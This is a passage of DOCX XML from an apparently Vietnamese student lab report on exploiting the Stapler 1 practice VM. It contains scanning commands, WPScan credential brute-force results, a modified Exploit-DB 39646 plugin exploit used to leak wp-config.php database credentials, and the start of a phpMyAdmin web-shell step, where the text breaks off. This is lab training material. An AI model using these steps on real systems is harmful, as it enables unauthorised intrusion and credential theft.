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8"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>BÁO CÁO THỰC HÀNH</w:t>
        <w:br/>
        <w:t>STAPLER 1 – ENUMERATION AND EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nguồn tham khảo: Udemy – Lecture 10 (Stapler 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Môi trường thực hành: Kali Linux và máy ảo Stapler 1 trong mạng lab nội bộ được cấp phép.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Mục tiêu bài lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Thực hiện quá trình thu thập thông tin, xác định dịch vụ web, kiểm tra WordPress, giành quyền truy cập ban đầu, tạo reverse shell và leo thang đặc quyền lên root trên máy ảo Stapler 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Thông tin môi trường thực tế:</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sz w:val="20"/>
              </w:rPr>
              <w:t>Nội dung kiểm tra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="1F4E78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kết quả thực tế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="1F4E78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nhận xét</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Máy tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kali Linux – 192.168.56.105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dùng để quét, nhận reverse shell và cung cấp file qua HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Máy mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stapler 1 – 192.168.56.107</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Máy ảo mục tiêu trong mạng lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dịch vụ web chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTTPS cổng 12380</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Chứa WordPress và phpMyAdmin.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Dò quét và thu thập thông tin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1. Dò địa chỉ IP và quét dịch vụ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>netdiscover -i eth1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap -p- -A 192.168.56.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mục đích: xác định địa chỉ IP của Stapler 1, các cổng đang mở, phiên bản dịch vụ và hệ điều hành. Kết quả cho thấy máy mục tiêu có nhiều dịch vụ, trong đó cổng HTTPS 12380 là hướng kiểm tra chính của bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="1829673"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(400).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1829673"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 1. Netdiscover xác định máy mục tiêu tại địa chỉ 192.168.56.107.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="3210453"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(401).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3210453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 2. Nmap quét toàn bộ cổng và nhận diện các dịch vụ đang hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Thu thập ghi chú qua FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ftp 192.168.56.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>get note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cat note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dịch vụ FTP cho phép đăng nhập anonymous. Tệp note được tải về và cung cấp gợi ý về hai tài khoản Elly và John, đồng thời nhắc phải cập nhật thông tin payload. Đây là dữ liệu hỗ trợ cho quá trình enumeration tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="1250088"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(402).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1250088"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 3. Tải và đọc tệp note từ dịch vụ FTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3. Quét thư mục web HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dirb https://192.168.56.107:12380</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DIRB phát hiện các đường dẫn đáng chú ý như /announcements/, /phpmyadmin/, /robots.txt và /javascript/.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="4423020"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(370).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4423020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 4. Kết quả DIRB trên cổng HTTPS 12380.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>curl -k https://192.168.56.107:12380/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tệp robots.txt cung cấp thêm gợi ý về các thư mục cần kiểm tra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1147060"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(372).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1147060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 5. Nội dung robots.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Thu thập thông tin WordPress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1. Quét WordPress bằng WPScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wpscan --url https://192.168.56.107:12380/blogblog/ --enumerate u --enumerate ap --disable-tls-checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mục đích: nhận diện phiên bản WordPress, plugin và tài khoản người dùng. Kết quả brute-force trong môi trường lab tìm được các cặp hợp lệ: garry/football, harry/monkey, scott/cookie và kathy/coolgirl. Các tài khoản này xác nhận cơ chế đăng nhập WordPress hoạt động và phục vụ kiểm tra quyền truy cập.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="4133119"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(374).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4133119"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 6. WPScan nhận diện WordPress và thực hiện enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="1113613"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(376).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1113613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 7. WPScan tìm thấy các cặp tài khoản/mật khẩu hợp lệ trong môi trường lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2. Khai thác plugin để đọc wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WPScan phát hiện plugin Advanced Video Embed. Script Exploit-DB 39646 được chỉnh URL mục tiêu sang HTTPS của WordPress và bổ sung cơ chế bỏ qua chứng chỉ tự ký.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nano 39646.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ssl._create_default_https_context = ssl._create_unverified_context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>url = "https://192.168.56.107:12380/blogblog/"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python2 39646.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="2560187"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(381).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2560187"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 8. Chỉnh sửa exploit 39646 để làm việc với HTTPS của WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploit tạo một tệp có phần mở rộng .jpeg trong thư mục uploads nhưng nội dung thực tế là mã PHP của wp-config.php. Sau khi tải tệp về và đọc nội dung, thông tin kết nối cơ sở dữ liệu được xác định: DB_USER là root và DB_PASSWORD là plbkac.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wget --no-check-certificate https://192.168.56.107:12380/blogblog/wp-content/uploads/597022742.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>file 597022742.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cat 597022742.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5943600" cy="4539556"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image(387).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4539556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hình 9. Nội dung wp-config.php làm lộ tài khoản cơ sở dữ liệu root/plbkac.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3. Đăng nhập phpMyAdmin và tạo web shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sử dụng thông tin root/plbkac để đăng nhập phpMyAdmin tại địa chỉ bên dưới. Sau khi đăng nhập, chọn cơ sở dữ liệu WordPress và thực thi câu lệnh SQL ghi tệp shell.php vào thư mục uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>https://192.168.56.107:12380/phpmyadmin/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tài khoản: root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Mật khẩu: plbkac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
